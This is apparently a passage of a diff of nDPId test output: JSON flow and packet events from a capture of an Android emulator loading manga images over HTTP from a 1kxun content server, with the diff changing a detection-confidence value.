o+UzoAWIIORIsCHCthQaxukg3CAu5XzfhZtc3nRZS9IUtvQORxhZ+HSpozkqS5VLdbWAOlsWGIGpkEmQOT4VSvcv8Scw3nEnf5f57Mckwfcv\/48CL9BxG2tl9S5im9NV0esQBS4x4GlPGhzmBLibFPumvGL0AoFt844Lbo7iayKSyKSGH4rNVBladJTlmIwV5N5wMjROgBK\/85+vHqE3VUGS6njvdkSBSy987XyMa161au6wYLeBOKQeGotUtQS0Ln52T9ESjQDQU89uoKDcxpbDZx3cEZSkiDymkaUkQAKRrkFrvO7l21XPFy1VRYVBGst0rDU\/XllzzY\/0y6OEd7cx9YYlrYJfcA\/HalWy2e+\/NJQZ0jg2hXvDZSj"} -01041{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":10080,"flow_tot_l4_payload_len":12046,"flow_avg_l4_payload_len":4015,"midstream":1,"thread_ts_msec":1654385146472,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01041{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":10080,"flow_tot_l4_payload_len":12046,"flow_avg_l4_payload_len":4015,"midstream":1,"thread_ts_msec":1654385146472,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1654385146479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146479,"pkt":"nLbQ0+MztKXvZygQCABFAAFRPDZAADYGrVYOiIhswKgCfgBQwNqXNB4kXP6K3IAYAHppHQAAAQEICpoJIhseulbsSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogNTQ0MTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDNmOWUxOTYyZTc1MjM2YmQwNDQwOGVlMDFjMWM3NGI4ZjRiYTJkM2MNCg0K"} 02408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1654385146479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146479,"pkt":"nLbQ0+MztKXvZygQCABFAAXUPDhAADYGqNEOiIhswKgCfgBQwNqXNCThXP6K3IAQAHoH\/gAAAQEICpoJIhseulbs2EQnm3dW5NpHc5sR6zYFLkK0FMFEDWcY52F66EPzn3fkt+HTn9roK+1oYu+87d3Fe6e2hB4Cv0dyvGXqZhzGtjaFIs1sqpNyDme\/d2VPz2vgTvzWfwec81SNc+Xq93Fp2AYKjQ\/ONTs7l2xm6I4Pj13c9pp5szRNcue+WfKu5GqQ3MZhEWBRdWFdKLrXGxOuP5rY8yyeq1vEsI+\/6PJc2c7uZO7u25ZgAbqjvOgcMfmLD2RvIehRt9zwnpsrh7QVlOnnAwWV1o9PWHVgIvCIIypR5+xplafVx851crHU7Ea+l0Kcs1DTz0toDnI1EZdW9zy2zN2PNbCLAGtcc6OLhflSFbHBw\/EfUPBUQLNIU+pdqaFjsZhKyfASWUPGCDSkqpTxGb7HxvVJ\/ZQHz2Mg0mH9On5j6AZ5bvoZxwML3kjfOp9j5QMpzGudiU2oIzt7zHpLy0CqktzO9XlzYh5XP165QEpygV60+0i+ovXlzhktabSr+BLben4fcleuk9A0TPDR85+i\/OWzjvoIZZv1ee8iZXVqNDFto1RI6QvTRdY+afTvL1TPRbW5+npW9yV7XVZadevGNbdbbs+emxG8+NnhLD2wmPVBqiS7o+iDHU4KUHLSpaadedoIGHcdhNCnHr5Mq7QmaDlKnWx9235r0vPWIt23fO\/ongWHoNfxHt6JNqXUqlcTk9OqwlEwP5k6H1swNo0xYsXz9Xb0mkBY1nn3CLOzFaZuOz09ppC0hK4L0bIAxwipq5uliADq7KlzXOqXFC6Xq6mc7l1WXNDVZOHFxlq0keNc3QXJa9n8\/wDfc1C93Ze8R7fxx3lPp3y31dB67u7KQ6l1xVXeQ56hfFZvXUr6INkuNCeRFBu7ULwxgpEI+ZUis7aPCVCmWraNjWRvtxWiUnBFQsmgredu6OR16iN0w7P08TUt1hNCq51iWhAuW4XUzdSaEg9x43Wg\/qpGSY7y3qc4j5hr2+hPlzAKBbp51NamSm8O3kbrnU9RhEhXUWq7fnKNcWzAamIoQ6gMJOL5+ntXl6Mke0PBGryysK0yCyzmivLYSTHWLvIdtpXBnBNDIGVk4cDduEV7NgNCXZmaTQt0dXaR2qN67X8L67jq6tDBnUdclXcvc+1+TerLsVtWq+N9QbVnTJEypzXtpIudPOXptSUuWtJwpko62V0M8kj6TMa3kRVMUrcHlm0WZGk9dSXDq04+57oUwqWsvULP0s2nHAurQiaFQvGc8EklVzkxFVxmY6Nh+r8x7WJ0AMxHUuCmJRSRW8\/6EXnWD+mA95DL3c\/QLIfVVmmyMV58crVlchFCtNQ6OtRaZ2mgCcTqcqFJwlabxIPCLiMKROn181NYOVF9jvnXE+ptWkvSdwN3Cr54+GWsqgtRm6swWSaXMNybi+xupbFn3nn\/AEfNomOTd0hxlW7Cstn6+ODpj896OqCuC0uuzS+g\/PAyqmZDKMsFoNlJR97AHn308fRpLZTqrLOVHdKkmJK9869Z4OoH6zyJaJ7HAHLgvU471Uwzy+gJDbWfkxw6eZfnmmhtTv4+NTJskLNJ4OqnS2Kem6p9Mbu5tFeuD3RG0pjKjjs3Zl8B6lzzrnYtxloY9KNAy3VxtW1WA6N9OqlijV1ysABVaCWZLeklCLl+f0kooetds5fqlCmTOvl01ONx3tGKF5rG836bApDUyPQ52GR6jyHrS4cttOfTgJes8z081EikwP7jzHtJHu7p7u7tozWvCLT3FkHkZmwi0lyzPHK3JQi4mBqQ8bgyhamx7u4hNyIxEIwVrSgoV3xrLBFvHnBeXp1YCF0vU+N+gsnhNI2li71elosslRdE\/jfSNtEZuXfPfWeTTsfWAzGZdm75bUWfnyM3a1Wnq6kWie7uG4cro+R5loHRh+9+f6yb1xg3jlW1iubTHPO9Z6bS"} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1654385146496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146496,"pkt":"nLbQ0+MztKXvZygQCABFAAFRYcVAADYGh8cOiIhswKgCfgBQwPQgi0PiRUrd7oAYAHrBxAAAAQEICpoJIiweulcCSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS93ZWJwDQpDb250ZW50LUxlbmd0aDogMzE4NjANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDgwOGFlMjgyYzI3NjI2ZDJlYjYxMDFjZWZhZmFlNzZhMGEzODM4ZGMNCg0K"} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1654385146496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146496,"pkt":"nLbQ0+MztKXvZygQCABFAAXUYcZAADYGg0MOiIhswKgCfgBQwPQgi0T\/RUrd7oAQAHpAqQAAAQEICpoJIiweulcCUklGRmx8AABXRUJQVlA4IGB8AAAw8AGdASqyAToCPm0wlEckIqIlKHKcYKANiWNuVSIOIssgku+u81XoBT3\/LeIyrp+8Q\/bpO+8rjk\/xq4H88\/fn2953j3vqG59Hq7\/5fPx9LX1a\/pD+bV55ntZ5hh5IvnfX7+c\/c\/8P1rP3XLv2o6l\/0H9EaBP87wb\/X\/6\/0EfeXqUQuPOlBXdRfkeff259gb82PYj\/xePv+Z\/53sHf1H\/M\/tn7xP+r5tP2b\/d+xp+yW\/UiY3RZLtT4MDGKDY81TAVspXTXDGXJa4s3dqytWghww8+TNyimg4UhGjtsAotyww4+R1YOB4C3dEUzv+s4TEyPqA7x2vP9UTSksd8ePwx1tvpkwm614cdoaVp1QQDkBCDyIaWExv18Hup+j74D\/qcAJQqC3jkpSy4Z7CSIqzQIoGRKCjGFp22u5gDkFqhyWEs5LntkSFZUEYYl7xDYtcp7nnqWGUQ9HCZdQmHhhrz5YRzncbST\/+yT+eno9CC+VrV57objw7X\/SrCJu\/BerO1FzWUkmLuqSNvnfuWGFmopHdwfOY84vg0qB9m+JxMcHe3JxGc5t06QmWwfn09phXcGI5NAcK\/btASrGvy8IpSsAvqM9\/9UfMuXqsKUIjb77lqUcje3tSNNbWSZISltxD7ruU4YF8hb9Yt+vuLwaDRQQ4e7A+3CwRNGn4UXvE6+KFf\/NcHY1PyUkUBxVLg20R7WsBr8g6rE7PO+Kei8XAxBW\/YUwEPaw5lBxgrppGH+lMXLhNVOllXzji+Z6vK6hsy3mBGxXB3XA4pJFyyu3s\/jjl3tfE2xMp5VWOyeqECqPGil5RN+bBEV5mjoXObZTRrZWSDClKh71TpKVlzsQ6WG6OPmeXbXYu8STlKtzrFTTU97zYa+UVTXXGuoNoRILHttFFQuA88IJn3aHlRUuva8bpaaf49mg\/pcfHs1cS6eQpYuDfSM11V0iYSx\/8J+7gaf2eLfitKqY0uCur+v3Q98noUFVzpZ17vnl+eBYzbIBj9CAuLeI9ilkbjN2W4axFNIVbypMrTV+W4XeWy74QfKbfVfCT4a6uHCjjp8hStUbSdfeOpfF\/uiFI84ec0Lftonn80FSgzvOOHCA1x35rp+b3CZd7+oPkgkPPxCSpMgBW2\/KJIR305i6hCMUURb7dJyRBqKBUUSG7yT1a1fwYZLQL80RIud6Mv8xjp+v\/4+o\/ONJTv3zBlmqx8SK66adRQtwZM99p5WBLwOsel68J6NmAEP+J1WKzpmZGycpaCvnUTAck\/jb+H5EgNpZFNgVaLNdbIPdDbOG1GdKyhsxyKKu3zcaNOqkcCNQrkPcARlDwFI2ETeB8aNim7pYnvFBIqQlFKNUvTB3RVCljRTwmhmiAfQr7QaRy4m74V+0BH1yTzwEVs\/B3+ReNLhBCIhBkVuDZ3h6hKHuc4RJ+pdzkFHYGG\/sUcHHGYSaXewsKtOKCSImqlkrjCYkMM0mRTUYqMwE4FZvxRR7Uw55Rf6J\/LncYrxeVIzO5qqcWdOCvcY\/6lm9f4jfTcqx4uvW\/mbQa\/thy1EZlJzgCptXr3VMlLGPEhyncvOuHbKKuXh\/1638vWC4LD3vqLLbaqQR9aoqr2BxhZqsOCU6gEF5Wdb5K8v42QXu6pttbAhAlmLv\/S4aTCnvcPXNsXpU8dhmUkG1oXmXN+msw0mWxcBUseZIah0EwQnaeNuPtc2KI9L9Nb9o4wgxomHRbgDLmqdw6wHVtAfsbwarEfN\/l6Ziq4eSzOtTp81C0wsrJqH6Th4RljhYKfwHbOtC0y5nuH8WZQ2moUdoTIYJJm62\/zSeC3f3w2kqXdhwUbG+qjZbmQMNfzYgv5eXnSXpck4Hrlz2yZuj9VIG+WV8wirBwSp\/mb+7nb4su6das4eYvNOUaSf"} 04379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1654385146500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385146500,"pkt":"nLbQ0+MztKXvZygQCABFAAt0gVJAADYGXhcOiIhswKgCfgBQwORvtMvRImpQ7oAQAHplgQAAAQEICpoJIiweulb6+ZKcD+KnwfgPmxIli1SDP0WB+TC+gZ2zUZ1MJYnOEnfgrEfocekJHaOM+Eztu22jDjbrklrlhsLXwktGW5jFzoZr3Ytu7HRoxyemV6NLVS1v4GRaLHUchrowoMimCyOxZHfNMnA0GNdZ10WtBsw4gEq8H4X8y8f3\/RYH5Mn6eEzqjI8sPaA+ORFtFcdQ+TmjpdZPUsTpyl+nLhU\/9GpHgFqC51W1e7CLdEBDq\/FQ2WwcSw4ZRTbi\/WGpayOUjE4QZtyN0YXULC8rCWHS4N1MsqhVl2K8H4X8y8f3wgnA\/Jk\/Twlux8TrGuEW5nLXTDPqGMQAlYiMJpFjD2haZrB7TzXXPMjVOcqB6d6igpIOmaJ7Y0Mrz2\/yEfvD5pWGi27w9bKORzLvk9ue8s4aiSRSmdLv8x2K8H4X8y8R8w82CiFh+T6YwGSptZ8TjC0FXdnJzdcE9uEyZwnCOep1wtTzpxjxgEqVLJABXHJLpS3bD6ip0PC8K7M\/yCNVfrglIVQ4OuF2gykfOcPmMbjrz6bh1RnUy5\/MdivB+F\/MvEfOMae6F\/kz9fTSf9smb1on3k+Iw7BNmS0w7MRktM8Ff0Xj9teNF8yzhLN9Jw6SBbhxxSs+M6O4bTT17SVdMQjaF+od5bknXbynCwEsZiOD2GyrhdKmNjvU4f8AG3\/MdivB+KdZllzOEugJUa2YWL\/J9aj6bQ3CMt2YfYZsFk7yyBnI7ZuzfktnJM8b72B45z44I7RsxuiJlZCW6LUdmRB1qCOgwTgI1k8kxEblTVuyjGQPDs14YOevoKw+ODo3i1ks4XE2bddW9CQgJt\/y3Yrwfjg64GjfvwiDex7cLF\/kwZyfP0quvVEcRYOMIYp5ETODXaWekEYIkDknM53nDjYsO5h8fopHtsi3VbhwS0xs7wlfY7RrfW4ggHRM4TVKy\/xlLF9ZudYs668Jlec31c3Uc4T6djHl6evUbLRtfynYrLT6x1eC2dIZO6R+eFivyZGSOkc21mpHBAjzTIn\/AMSAFqMsjPuzkhyEJLBGBy8WixGRGPj9CZ0fSPWNduT2zXAXBq4nWNVvTCfY2zMzKo93KeUCRF6QE5wqyJvtTuTQGRGx\/JdivB+EzowvA\/kwsD5ctdc9OWzlwbY\/hrOD0Tni7E1kzleJbw9c6TkztjQ2kFPTJ85GkJslvP6P0PmszQmBvhmsCpmV\/h5i\/wAKrtF9NiRwGbcho55wUuZm1QZNpkDtIp4QJBZux9ivGin\/AJ3YrwfhExDC8D+TCwO8xwl0xEbplWQ+OiXecqXG0mM\/yC0Q1JW27xCupVnhwyNdqtGTB6hU1mIgYa3XkU6RaOBRM7p+gp7ZXnVVY96yCCx1XTFmQz6loZ6wCyJiCZwo+r6JMZNRGntVDWuYW4s1nNM4YzptecOUlfSFv5XYrwfiqxYSXgfnnDK29jq6xf15wB2wMYa4OCHbMRrmnJUYKd0pn3uDcKWa8mN5mWssYXS+kp75S0NFRuwhKCjGq0wy2w+2tc6xMcQnczdpgsyJ1yC7ORsHTkidr6jFgpD+vB\/kdivG2SwV7JLwHzQgnsSsQF+zT0zOQjjEMVjw1haSkSCIifKvKC3mj5Y0dhyZTzYXaZ7OnSY+nXWc6hLZVtLsn02hItxp6DxJvpBmdcW05ScHryidMCdwrPYVhHQPlWZqvh\/wL5OxXhXaTPVs5T4eTzWpdZai96\/dJXUiQ+eG1NuMULl2+GOXFVBmq1wm1t\/e7SKgbUIjtjB3B5nYWMiVDAyzGQARrrMR25zOkcj8wWkqvOVKuOPHP92npNYb2SGVWylvqJyWCWEusWTUQWLpMWbUEJpj1Nflwp2yKgEK58uzhHT6ziEWLnUyjSKtpinmyDXPhX5PSLmemNZ4TvLZtjYws1JcAW4uOUNJUomsWOsxoMaFkbJg5iIk8I9Qh4CFtmqo7zGeZ07Yc9uR8tMiJ+iY7hvIdWRnXLIsDkMHOvOm4d1lQ6yBacLn\/orawufLsV4Pwr5HPbhlxHpzGGCPYCVM5Dw0dMy7hb4EQKWREd\/lAFhbTj\/UlXsoXgqgc4iw4YZo6D7\/AH9QZYAKLGGAZan3j45a8jnvynzGRGn1V3dPItxhFUZnpBLJE0yLhzcOf\/QMCqI2VfjnHYvwfhXkvC\/moyXHqNcWyJH25Z4YBlXpwghd3It+SbIacSD9e5DuGB1I\/DDh1lrQkmTqSUkyJMYzTc0y6jfonJ7ly\/Y\/VPhfyyMGJmatA2IvCpBymdETpKz96fyI\/FjcV4OOyvkfhfyEdy5jIORz1i8EoITTMYZ++bEgYTuztmvYygA7dR4nKdPs\/wDw0zq\/aH2p3aQOLIQwz3nymfojI7R9AnHTPwgdx6HpPmI1WJQYXYkr1QJ6s93qGc3elCtP\/NjcX4Key\/kfiJ2zWsxhaGBeJ8o1WRRM5K9W+m7jArmsyWkPuY37mAexVQ5kXU0Ol\/C2LyFCUzUZEJPolcISMZ2\/RM6RPx5TkZHn6TnvSASnpryIVGEDnZWtFSC8xDZDqFgVsUvbDHCziMaQj9Nxfg\/CvJ+P1lewWpC+M\/6sCZkNcauJgI3w0ZNgAKljG0gDaLZnelnTaUaZvIcuELkDXrEtlHTJncf0T3k\/lzjyHnlrymdCnzSWEJ3AMzYkcVaIbDRK45dYBywMMGsuRy5a9HTpTo1ha148OjF+D8K8lm2cIcjAcwV+pXyCd2XLPUJYmwhjbBnuKA05Wo0dldu4Sx0blik+naLpoHxzmdIpJ61iOCVdZ4HTyeBVMZwOsIWKAKWPj6DwI1OnG2rOwsuJEcMIlkyzWETOFTgxYxYBbtHcsVZ++f8AFjw7F+D8K8zyPyCuqyFFt9OvAg2TduQkFnrFRwADHEUV5jbjLYDJbmFI8hZ1YLvFVu5HHJ2iPjmU6zSWYwsrW2WWBiD\/AOcmnOWY0r\/r6D8VQ3sSDZj08TLkwL+ipeK+PjCfGziF0rbMrfyi\/h\/puL8Hge2dYnJnTBEjKtW6C9YmNcmRAGx1Y4ZIQ+Ggc9HrT7Vi5kwvhzpZYCcnTQp751N8rOVzxV\/WfHjkU4sd7K49tceW9lgtFriIXfLRX0lnDo7qn2MdshEdzZ1D64xjC2q4wwt3IZ2n4p\/pneRHtsyhUh728KWWTws4KukVDqGu\/dGxWWHQfL08wKvuCRAldq02w2xcfI8OLS1BZJ8ojWW+zHDGOLc2PGT2jKi9Wp7Ruxc7n2D1jdnEJ1bz1KM38qJQK\/Ue0AyXaxr2V5ayN9p02bX65ILqcI\/UD35cOTKU5BwZ69QfZt6mdSJwrBzgsMyozo9GisNg6WrPunvNSdLUc4nbDmdosbUeZzxhFukYyqW3BONN2JL3sLVu7Lk\/d+jTNBjE7SlOgw2S0ie8BM5vFS5sEXKPHLgvv4XaSVZ27AGTJFFiyFUbGq3Z04CqqN4luHFjERq\/HDsxXmr\/ACFj1JSXVziFY6tzFTtbHMtcIZx\/bI8zGmFODGuTi+2AzbkPjIPaxs+6Hxlufd9Jea8iA6smBV3iBGN+6bVnrEU8gnJzTP8AHi1pcQr9cDHTKc6Wx75u7mP2gPtBGhktMo27Z3nlqPuBMRnDq0mdpm4xP71yuq+PEKK44Vg+IjWYXkhGPyz2xLNkkWRGvIO5QO6NkjkRnfNxRkmUYepQE9uU+I8TGuI7ZGDIjBM1yy37X0jn+P8AaG5Zfpa4XT3ZOT853LwyA57ZBhnnNCy3\/KR+WrlL89j4Zp\/y4v8AGvIwsPLXkfOD4LwHwH48ixnn+5+I+fIsHxi8H4fu15sfn\/Q5+585HngHyblr+Wv8c5\/acmI3bRzwx\/YYmdP\/xAAqEQACAgEE"} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146710,"pkt":"nLbQ0+MztKXvZygQCABFAAXUgVlAADYGY7AOiIhswKgCfgBQwORvtNcRImpQ7oAQAHoCWgAAAQEICpoJIwAeulfZAgICAQUBAQAAAAAAAQIREAMSITEgQRMiBDJRIzBCYXFigf\/aAAgBAwEBPwHwT4w8bm3USMYxX27PjlLlkYJD1Ir2KafTHpqx2v26HH3EU7EPHsmL+zZdjdCUtT\/h\/wCYGlBdk9ZRG5T\/AGdDWmlwPa+iMpR7N6l0ONfqTpkZl4smLFZlwJ4RYo0N2fI62kNaCW0nq+oEYe2LTjRLbfBpxi0ShGOLeEqLojK8TEIcrzqO3Ylm6Q5WXh4it\/Bzp8mhX\/0nJRnwSL\/jx6LJiwvBZk8vKtPgk3XJPreicVGA2JWdFi5KxEmIXeGX5NCid8FFcDQp0uUKM5Kie6L+w\/5EuCUaFGzZQuTo2ut6JOxZZXik3yNC4VjUeyjckLklSIytWa7W2vYkmuySo9YuyL5H2afdeiqIrF5Xgl\/TY2N4TEvtRONS2lx0o17Kjsv2OLi7JKL5RJJxtF5SpFlXEu+xf2dSdQoVpk408I0dNzdnxJ6m01dNQR+5OcktjPjTIxsktuIw9smx\/wAkJR28k6vgXkot9ZVOZqcITTJaf8FGjqqCpm9p77F95W2JqH1kS1N8ro+0SLUGSlZGKXI3Q3YkuhRvhdmpGmIWJK8qbXWfx+Z0a8eLGqE+CUZVbO4kokG0+DfIUmjfLKkX6KwnTs1J7neL8oxbIxSVGjppcjjaJx2umM+W4bTTltZrxqmiiiisR021Z1i\/DabfGOjYoqIuRKsfkwtWIsuiWpujtEhtIaKKN\/1rzssrPRZKddn4rc3eWrRqR2yaFiKoRLUjdCeGhupULKyi8PvD1odHy30PcnyaGvt\/4KSasnrbejT1dySNWMlLk6xFNsrkdCdEluO0NclYRtLihixY2Wh8TGjsiq4NLX+N89EoqfJopxZrxuGLNL9icK5HhD46yxriy8PwfeNRdPwmaWq48Gm7ZPofYjS\/ZH5MtsaFTjQtMdLosReKoQ1fg8Ujbu4I\/iR9s\/J0VCKccT7I9o3VTJMl2McmhycuxG\/Ho3F4trsv+CzvwWdOfHJrx3QeJ94+T60zQ1r+jNT9i\/Kv5wmJknYv9DZ6OUX4ItpkJzlKia2yaJYYnTsb9mnpSkT09vh0PoeIsbTRvOH7JZXglFnEI2Tm27Y3Ymd8iVmlpQ9iiakOGihtCd8Ej14XheC8FI1NVylRZSNpVY0Hx\/zE198r9jVRNkY8DWGsIZWI5eGuSvBmh7QpfU1JrsfIhGq7Q+RSGhrCXhVi\/t6LakamrtG5SEuBCJdeHY8VwesLEJblfihFihJkdJezo1OZFliOmSXAvBlG2O2\/FKvFo\/0RnXSPkmW\/bHqpdF+8oqz0dYjKuzchsZtf7ZoXlFWa0Psj5GNtlCVj4wxcFikNZoaw39PBE+jaxyFO1WNPs1K8ExliOxPCbXI5buiKHed7khl0hdY9nAo2bafB8basTou8cnwzZKO10N4WGy0WaenvQ9GSKaHxhP61iSuNEVUaFbXJRSE+ax2Vj4qSbNLRdHxcck5W2xiy2Xj8OdTocV\/A9GLNT8Z+iUUl1ybvullFexssQo2KVMkLs+NY\/I1NumxK3QxZeIqzQ\/dFn5WrKKVGnxBH5CjdlXK8rovLEx9FkjT1px6I\/k8Wz8rWUo8Dd4jl5\/GX9RFmq0+JLgjq7VtRrS5P8h5cjdZbGUV7OyhH+JrO8IhC1ZsPj+o8RNOPs03T7Jz3G+sN\/dDxaaxGBTLsXAvsS44Gzo0tRPgm7wl6NpRN1F4oSIcxxLhFtyw\/2RJ0OTZFcclIRSJOiLuPJdZkuCH16GhcGirdlY1l9co0lwdGoyixolyQXsTxeGf6EiRBWa6pcEHyW3wM0VwRijUjRNWhixodGoy7wj\/Ej+7Xl\/\/EACoRAAICAQQBBAICAwEBAAAAAAABAhEDEBIhMSIEEzJBUWEgQhQzQwWB"} -01027{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":1611,"midstream":1,"thread_ts_msec":1654385146710,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} -01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2000,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385147585,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01027{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":1611,"midstream":1,"thread_ts_msec":1654385146710,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; 